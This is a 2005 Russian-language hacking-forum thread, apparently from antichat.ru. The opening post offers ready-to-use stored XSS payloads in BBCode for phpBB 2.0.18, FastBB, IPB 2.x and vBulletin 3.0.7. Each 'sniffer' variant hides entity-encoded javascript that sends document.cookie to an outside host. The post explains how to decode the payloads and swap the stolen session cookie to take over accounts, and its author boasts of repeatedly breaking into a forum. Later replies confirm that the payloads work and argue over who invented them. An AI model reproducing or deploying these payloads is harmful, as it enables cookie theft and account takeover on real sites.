Kak lomati phpbb 2.0.18 i nizhe. Koroche na vseh forymah deistvyet. |
08.11.2005, 08:37
|
|
Banned
Регистрация: 03.11.2005
Сообщений: 14
Провел на форуме:
44692
Репутация:
2
|
|
Kak lomati phpbb 2.0.18 i nizhe. Koroche na vseh forymah deistvyet.
Mayalsya Ya opyati ot bezdeliya, i dymaiu....poidy phpbb 2.0.18 vzlomaiu.
Ny potratil nesoliko secund, koroche
lovite kod alerta:
Код HTML:
[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]wj[/url][/url]
Kod Sniffera:
Код HTML:
[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
Yberite znaki "+" V SPEZIUALINIUH simvolah!
http://webmastertools.narod.ru/Onlin...rl_decode.html
Dlya redaktorovaniya kyk von vam ssiulka. Lychsche vsego v Browsere Opera i ne zabydite, chto izmenyaete toliko phpbb2mysql_data a phpbb2mysql_sid mozhete ne menyati i ne trogati.
Sniffak delaetsya ispolizyya ety ssiulky:
http://www.h4cky0u.org/encrypt/index.php
Ny i komy interesno, chitaite ety statiiu dlya profilaktiki
http://forum.antichat.ru/thread10119.html
Kak lomati fastbb po mnogochislennoiu prosibe posetiteleiu antichata.
Alert.
Код HTML:
[font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]][/font]
Sniffer:
Код HTML:
[font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie); ]][/font]
Ne znaiu kak tam v fastbb rabotaet avtorizaziuya ne smotrel, no esli chto, to mozhno vsegda Adminy pomenyati
paroli samomy, potomy chto paroli menyaetsya na noviu, bez starogo.
Viuschla novaya versiya IPB 2.1.3
I lomaetsya eta versiya vot tak:
(Ya proveril, i naschel chto etot ko rabotaet na VSEH 2.* i na vseh 1.* IPB. )
Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javaSCrip t:alert(/wj/))`
Kyki voryem vot tak:
Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Ny i vBulletin 3.0.9 (Rabotaet do vBulletin 3.0.7)
Hoti Ya yzhe ego v staroiui statie i viukladiuval, no ne vse kazhetsya ponyali osobenno novichki kak kod pravit chtobiu rabotal.
Sniffer.
Код HTML:
[URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/FONT][/url][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ][/FONT][/URL]
Kstati, eto yzhe k wapbbs.
Viu svoiu forum posle moego tretiyago raza kak Ya vas vzlom opyati pochenili, a Ya OPYATI ego vzlomal. )
A kod ne viulozhy potomy chto diury zakroiite opyati i mne opyati pridetsya iskati tegi. Ne horoscho postypaiti Ya vas sorovno kogda hochy lomaiu!!!!! loooooooooool
White Jordan.
Последний раз редактировалось queen; 08.11.2005 в 12:06..
|
|
|
09.11.2005, 20:50
|
|
Новичок
Регистрация: 13.10.2005
Сообщений: 13
Провел на форуме:
56020
Репутация:
0
|
|
Отлично! А это работает на Vbuletin 350?
|
|
|
|
09.11.2005, 21:12
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
Mayalsya Ya opyati ot bezdeliya, i dymaiu....poidy phpbb 2.0.18 vzlomaiu.
слухай queen
а тебе не кажеться, что воровать чужое добро плого, в частности заниматся плагиатом
ЭТО ВСЕ коды Белого Джордана, если сам отказываешься в это поверить, то посмотри еще раз на эти коды и убедишься, у меня один в один такие же коды как у тебя, не могли мы с тобою одно и тоже подумать. Так что я думаю, ты сделаешь правильный вывод для себя, и удалишь свою тему.
|
|
|
|
10.11.2005, 13:06
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
Сообщение от k1b0rg
а Wj, закончил свою карьеру=(
изменил свое поведение, свою асю, мыло, ник, стиль общения, и возможно где-то среди нас, но уже совсем другой =(
ага мне тож писал он хотя в моем контакт листе не был... да и вообще надоело наверно быть всеобщим посмешищем=) да кстати эти баги фигня они не проходят=)
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
10.11.2005, 14:13
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800
Репутация:
547
|
|
в Ipb 2.0.4 всё проходит , просто супер.
|
|
|
|
10.11.2005, 15:12
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
ага мне тож писал он хотя в моем контакт листе не был... да и вообще надоело наверно быть всеобщим посмешищем=) да кстати эти баги фигня они не проходят=)
я бы не сказал конечно посмещищем, все таки он был знающим, как не крути но это так
xss и СИ он знал отлично.
а насчет его кодов, да, они работают тока надо немного их доработать, я проверял, все что он написал правда, и работает отлично, даже на ачате.
но я думал, то раньше, что &+#58 это наоборот, чтоб не срабатывало кодируют так, а у него выходит что все нормально.
|
|
|
|
11.11.2005, 11:36
|
|
Banned
Регистрация: 08.11.2005
Сообщений: 3
Провел на форуме:
9623
Репутация:
0
|
|
Сообщение от k1b0rg
я бы не сказал конечно посмещищем, все таки он был знающим, как не крути но это так
xss и СИ он знал отлично.
а насчет его кодов, да, они работают тока надо немного их доработать, я проверял, все что он написал правда, и работает отлично, даже на ачате.
но я думал, то раньше, что &+#58 это наоборот, чтоб не срабатывало кодируют так, а у него выходит что все нормально.
+ уберать надо.
|
|
|
|
21.11.2005, 19:12
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Сообщение от k1b0rg
я проверял, все что он написал правда, и работает отлично, даже на ачате.
Что именно работает-то ?
2WJ
Тебе конечно упорства не занимать, в плане поиска багов, но не мешало бы помнить, что все баги якобы тобой найденные, на самом деле были найдены античатом, и с применением технологий, описанных здесь же. Поменьше самовозвеличивания.
|
|
|
|
22.11.2005, 02:16
|
|
Banned
Регистрация: 19.11.2005
Сообщений: 17
Провел на форуме:
49385
Репутация:
1
|
|
Сообщение от Algol
Что именно работает-то ?
2WJ
Тебе конечно упорства не занимать, в плане поиска багов, но не мешало бы помнить, что все баги якобы тобой найденные, на самом деле были найдены античатом, и с применением технологий, описанных здесь же. Поменьше самовозвеличивания.
Ну не то, что все баги которые Я нахожу, уже нашёл античат....просто так скажу, 90% процентов, Я научился именно от тебя и zFailure`a. Больше всего от тебя. Это насчёт того, что с помощью тегов можно провести XSS атаку, засунув один тег в другой сам метод техники т.д. Вообще-то, если бы именно не ты, именно ты, то никто бы ничего не античате не знал так хорошо, как он знает, потому что ты был во многом первым и открыл море идей для других включая меня.
Теперь, многие твои идеи Я уже улучшил и постоянно улучшаю.
К примеру, уже спаренные теги,
Код HTML:
[COLOR=[IMG]http://www.wj.gif[/IMG]]wj[/COLOR]
которые ты придумал или вложенные теги один в другой,
Код HTML:
[email]wj@wj.com[url]http://www.wj.com[/url][/email]
которые ты тоже придумал, уже для нашего времени - старьё. )
Я теперь использую тройные, а часто четверные комбинации тегов. Вот это уже извини подвинься, придумал именно Я. =)
и с применением технологий
Соглашаюсь, что до тебя всё, что почти все люди знали во всём мире, так это использовать одну из функций как
увеличив буквы на всю страницу. Пришёл ты, и нашёл что в IE есть
style=background:url(javascript:alert())
и существует третья, рабочая кавычка.
Это всё работает только в браузере Микрасофта. (ИЕ)
По всем доказательствам ты был первым, который это всё нашёл хотя не спорю, что это могли знать и другие люди, и ты мог быть не первым....ну во всяком случаи ты был первым, который вывел мир из тьмы незнания. )
Опять таки Я взял всю эту информацию и усовершенствовал её. Я теперь могу воровать куки во всех браузерах и делать это так, чтобы человек этого не заметил. Вот это тоже нашёл Я.
Античат был базой и есть база, вот так скажу........античатовская школа, инфлуировала много-численное количество людей. Но никто не стоит на месте. 
Последний раз редактировалось Бафун; 22.11.2005 в 02:31..
|
|
|
|
05.01.2006, 06:29
|
|
Banned
Регистрация: 04.01.2006
Сообщений: 10
Провел на форуме:
24702
Репутация:
2
|
|
Сообщение от Algol
Что именно работает-то ?
Уязвимость Булки 3.0.7 что же еще.
Только сейчас на античате тег фонт - просто отфильтруется. Не знаю сделано ли это чтобы показать, что никакого взлома не было, лoл, но по крайней мере свои атрибуты в теге фонт до сего дня можно вписывать. в теге фонт, теперь не пропускается кодировка UTF-8, слеши и скобки. А так, все до сих пор - работает.
Последний раз редактировалось Ricky; 05.01.2006 в 11:38..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
